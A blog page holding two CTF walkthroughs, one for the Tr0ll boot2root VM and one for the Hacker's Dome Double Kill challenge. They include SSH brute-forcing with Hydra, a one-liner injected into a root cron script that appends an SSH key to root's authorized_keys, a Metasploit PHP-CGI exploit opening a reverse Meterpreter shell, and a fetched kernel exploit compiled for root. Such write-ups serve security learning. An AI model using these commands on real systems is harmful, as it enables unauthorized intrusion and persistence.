Tag Archives: Dirb

Defeating Tr0ll – Infosec Challenge Walkthrough

This is my walkthrough for defeating Tr0ll infosec challenge.  This is another great “boot2root” VM  that kept my guessing quite a few times.  It also made me focus more on fully utilizing some of the scripts and programs I generally use during a penetration test.  I also really liked the fact that Wireshark played a key role in solving this hacking challenge (Wireshark is pretty amazing in my book).  So I sit down at my setup and begin.


The Tr0ll VM can be downloaded from


After loading up the VM I use netdiscover -r to find it’s IP address which was


Now I start by seeing what Nmap can tell me about this system.

[email protected]:~/Desktop# nmap -sV -P0 -A

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-19 11:42 EDT
Nmap scan report for
Host is up (0.00060s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap [NSE: writeable]
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_http-title: Site doesn’t have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:27:F2:5C:A9 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:








Network Distance: 1 hop
Service Info: OS: Unix

1   0.61 ms

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds


Since the webserver is enabled I’ll continue to gather intel even though I really want to check out the FTP anonymous service that’s running.  But patience really is a key to beating a lot of these challenges.

[email protected]:~# nikto -h
– Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2014-08-19 11:44:43 (GMT-4)
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ File/dir ‘/secret/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting…
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6605 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2014-08-19 11:45:03 (GMT-4) (20 seconds)
+ 1 host(s) tested

I also continue enumerating the webserver with dirb since it’s just part of my methodology and you just never know.

[email protected]:~# dirb
DIRB v2.21
By The Dark Raver

START_TIME: Tue Aug 19 11:45:38 2014
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt



—- Scanning URL: —-
+ (CODE:200|SIZE:36)
+ (CODE:200|SIZE:31)
+ (CODE:403|SIZE:292)

—- Entering directory: —-
+ (CODE:200|SIZE:37)


Now my thinking is that I’ll check out the FTP service and then look into /secret web directory if FTP doesn’t lead anywhere.  But FTP has to come first because who finds anonymous FTP access anymore?  So this is at least interesting, which in my experience is a good indication that it will come into play at some point.  I also looked at SSH but that seems to be pretty normal and trying to exploit this version would prove to be pretty difficult so I’ll leave that as a last resort.  So the first attack vector to look into deeper is FTP.  I’ll see if anonymous FTP access on this server can provide any clues or further information.  If not then I’ll dig deeper into “vsftpd 3.0.2” to see what type of exploits are available for that version.

vsftpd 3.0.2

The anonymous FTP contains only a single file called “lol.pcap” which has really peaked my interest.  I go ahead and look up “vsftpd 3.0.2” exploits but nothing really pops out immediately so I’ll put that on the back burner for now and focus on the pcap file.

[email protected]:~# ftp
Connected to
220 (vsFTPd 3.0.2)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 .
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> pwd
257 “/”
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (16587.2 kB/s)

My next step is to copy “lol.pcap” over to my machine and load this up in Wireshark and see what kind of traffic it has.  Hopefully there will be some useful information for me to use.


So I see an FTP data session that shows a file transfer.  Luckily FTP uses cleartext so I’ll be able to dig deeper into this.  I can see a file that was transferred called “secret_stuff.txt”.  I reconstruct the FTP transfer and what do you know?  It gives me a nice little message.


Ok I can see that @maleus21 is messing with me.  I go over the traffic several more times to make sure that I didn’t miss anything but it looks like I’ve found all the useful information.  And of course I continue to feel mocked.


My only clue here is that “sup3rs3cr3tdirlol” is mentioning a directory.  Since FTP doesn’t have anything more for me and I have no SSH information to go on my only hope is the webserver.  So I whisper “Help me Apache 2.4.7….Your my only hope.”  First I try out the /secret that I discovered earlier.  But this is another dead end belittling my skills.  But I check the source of the page just to make sure but it’s definitley a dead end.

With limited services running on this box I’m hoping that “sup3rs3cr3tdirlol” or “sup3rs3cr3t” is a web directory since I’m not really seeing any other options at the moment.  So I try /sup3rs3cr3tdirlol as this is really my only move at this point.  Fingers crossed and BOOM!, I’ve got something.  This is when the little tingling feeling starts filling up my stomach.


Awesome, that worked and now I’ve got a file called “roflmao”.  Let me check this out.

[email protected]:~/Desktop# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x0e42145e99e559aa4908f5c259d983044fcfd2f3, not stripped

Ok so it’s a 32-bit ELF file.  Let me see what else I can find out about it.

[email protected]:~/Desktop/Troll# readelf -h roflmao
ELF Header:
Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class:                             ELF32
Data:                              2’s complement, little endian
Version:                           1 (current)
OS/ABI:                            UNIX – System V
ABI Version:                       0
Type:                              EXEC (Executable file)
Machine:                           Intel 80386
Version:                           0x1
Entry point address:               0x8048320
Start of program headers:          52 (bytes into file)
Start of section headers:          4428 (bytes into file)
Flags:                             0x0
Size of this header:               52 (bytes)
Size of program headers:           32 (bytes)
Number of program headers:         9
Size of section headers:           40 (bytes)
Number of section headers:         30
Section header string table index: 27

Everything looks pretty normal in the file and I don’t see anything slapping me in the face so it’s time to run “roflmao” and find out what it does.


[email protected]:~/Desktop/Troll# ./roflmao
Find address 0x0856BF to [email protected]:~/Desktop/Troll#

My immediate thought is that 0x0856BF is a memory address which starts making me sweat.  Like all the great hackers before me whenever I get stuck, I stop and ask myself.  What would Zero Cool do?  Lol, actually I would never think that but it does make for a better story doesn’t it?

Zero Cool

My actual thought is this.  What’s the simplest solution?  What do I know so far about this system?  What do I know about how Maleus thinks so far?  And my subconscious whispers “directory” which makes sense since it’s clear that Maleus likes using obscure directories as we’ve already seen.

Hacker Pro Tip:   Don’t over complicate things.  Remember KISS?  This type of thinking has saved me more times than I can remember.  Plus I’m always looking for shortest distance to an objective since I’m lazy.  So why not try “0x0856BF” as a web directory since it will literally take 4 seconds.

So I go for the long shot and try /0x0856BF.  Awesome, it is and more stuff is revealed.  Two directories.


The first is /good_luck and the second
is /this_folder_contains_the_password.  I check out the first folder and find this text file.


Which contains the following.

genphlux < — Definitely not this one

So these look like user names so now I check out the second one.  The second folder contains this file.


Which has a nice little message.


Since FTP seems to be setup for anonymous access only I’m going to focus on SSH for the time being.  I’m going to use Hydra to automate logging in with these accounts and “Good_job_:)” as the password.

So after several attempts I begin to get banned.


I’m not sure about the timeout since I control the VM.  I keep on rebooting the VM and trying again but it’s the same story again and again.  The only good thing was that after numerous failed attempts I started looking into Hydra parameters more than I have before and learned quite a bit more about better ways to use it which I know will serve me better in the future.

After trying all the accounts with “Good_job_:)” and getting no luck I stop and take a break to clear my head.  I’m clearly missing something.  After some time away I come back and go through everything again to see what I’ve missed.  Knowing myself it’s probably some small detail that I’ve overlooked.  I start looking at things a little more closely to see if I could come up with a few more passwords to try.  That’s where reading the folder gave me the idea for two more password choices so my password list became this.


After trial and error and numerous more reboots I finally get a match for “overflow” and “Pass.txt”.  Sweet!


Gaining Access:

Shell – Here I come.


As soon as I start looking around I get this message and I’m booted.

Broadcast Message from [email protected]
(somewhere) at 10:00 …


Connection to closed by remote host.
Connection to closed.

Ok so it looks like my session is being timed out.  I log back in and do a quick run through for any files that catch my eye.

$ cd /var/tmp
$ ls -al
total 12
drwxrwxrwt  2 root root 4096 Sep  2 12:17 .
drwxr-xr-x 12 root root 4096 Aug 10 03:56 ..
-rwxrwxrwx  1 root root   34 Aug 13 01:16 cleaner.py.swp
Looking at the swp file I see it refers to cleaner.py as you’d think but doesn’t provide any other information.

Even though overflow is a low level user I do a “find / -name cleaner.py” anyway to save some time.


Ok so the very last line shows us that cleaner.py is located in /lib/log/ and a “ls -al” shows it’s owned by root.  This could be good.


I use VI to see what’s going on.

#!/usr/bin/env python
import os
import sys
os.system(‘rm -r /tmp/* ‘)

Knowing that root owns this file and seeing os.system I know what my next move is going to be.  I’m going to have os.system echo my ssh key into the authorized_keys for root.  I’ve never actually done this all in a single line but it should work (at least in theory).

So here’s what cleaner.py ends up looking like. (I’ve shorten my key to save space but you get the point.)

#!/usr/bin/env python
import os
import sys
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “ssh-dss AAAAB3NzaC1kc3MAAACBAI0mFQzmVthxmCywdKX/ZYDnN/9CzgpRsVTYRgffWU+43xuNRoy+HUGUBxGTuQBaaPMLYEMZgQFkvc+xG0sTfjf73


== [email protected]” >> /root/.ssh/authorized_keys ‘)

Now I save the file and wait for it to be kicked off.  What’s interesting is that when trying to save my changes in VI it comes up with a permissions error since I’m logged in as “overflow”.  But when using “cat” I can see that my changes have been saved.  Sweet luck for me!  After being disconnected it’s time to try to login as root.

root ssh

And success!!  I’m logged into Tr0ll as root.  Then I looked to see if there is any type of flag.

[email protected]:/lib/log#
[email protected]:/lib/log# cd /root/
[email protected]:~# ls
[email protected]:~# cat proof.txt
Good job, you did it!


Double Kill – Hacker’s Dome CTF Walk Through Part 1

This past weekend our Quantum Security CTF Team (consisting of Kamil @vavkamil and myself @jamesbower ) competed on the Hacker’s Dome – Double Kill CTF.  The competition consisted of two vulnerable machines with each containing both a user flag and a super user (root) flag.  We were able to capture both flags on the first server and here is the walk through.

First target:

Nmap scan:

Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-26 17:06 CEST
Nmap scan report for
Host is up (0.067s latency).
Not shown: 996 closed ports
22/tcp  open     ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3d:ab:fe:49:52:95:1e:f5:bf:9f:eb:ff:d8:6e:fb:16 (DSA)
|   2048 5c:43:53:0c:cb:50:57:3b:c6:b6:68:32:4d:fd:5c:f9 (RSA)
|_  256 f0:d9:63:a2:e0:b8:47:cc:46:32:19:2f:89:4b:a7:e4 (ECDSA)
80/tcp  open     http        Apache httpd 2.2.22 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title: phpMyAdmin
|_Requested resource was
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 9 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSH is relatively up to date and so is Apache so time to see what Nikto finds.

Nikto scan:

+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2014-07-26 11:22:26 (GMT-4)
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 7355 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2014-07-26 11:40:41 (GMT-4) (1095 seconds)

At first I spent quite a bit of time in the /phpMyAdmin-4.2.6-all-languages directory trying to find some type of foothold.  But this remained fruitless and I felt like I was wasting too much time on one thing.  I decided to continue enumerating to see if anything else would appear that I could use.

More enumeration:

Dirb finds nothing of real interest.

Going back over my Nikto results I see this (OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution.)

I wasn’t familiar with this vulnerability so I dug a little bit deeper and came across a great couple of articles about it and was eventually able to find out that Metasploit already had a module for it.  Great!




msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

Name         Current Setting  Required  Description
—-         —————  ——–  ———–
PLESK        false            yes       Exploit Plesk
Proxies                       no        Use a proxy chain
RHOST                         yes       The target address
RPORT        80               yes       The target port
TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
VHOST                         no        HTTP server virtual host

Exploit target:

Id  Name
—  —-
0   Automatic

msf exploit(php_cgi_arg_injection) > set RHOST
msf exploit(php_cgi_arg_injection) > set LPORT 8080
LPORT => 80
msf exploit(php_cgi_arg_injection) > exploit

[*] Started reverse handler on
[*] Sending stage (40551 bytes) to
[*] Meterpreter session 1 opened ( -> at 2014-07-26 22:40:23 +0200

meterpreter > shell
Process 28156 created.
Channel 0 created.
python -c ‘import pty; pty.spawn(“/bin/bash”)’

First flag:

[email protected]:/var/www$ cat user-trohphy.txt

With this we’re able to get the first user-trophy.txt and move on to getting a root shell.

Local root exploit:

x86_64 x86_64 x86_64


[email protected]:/tmp/infinity$ wget
–2014-07-26 23:42:11–
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 3845 (3.8K) [text/x-csrc]
Saving to: `exploit.c’

100%[======================================>] 3,845       –.-K/s   in 0s

2014-07-26 23:42:11 (20.3 MB/s) – `exploit.c’ saved [3845/3845]

[email protected]:/tmp/infinity$ gcc exploit.c -O2 -o vnik
gcc exploit.c -O2 -o vnik
[email protected]:/tmp/infinity$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
[email protected]:/tmp/infinity# whoami
[email protected]:/tmp/infinity# cd /root
cd /root
[email protected]:~# ls

Second flag:

[email protected]:~# cat superuser-trophy.txt
cat superuser-trophy.txt

[email protected]:~#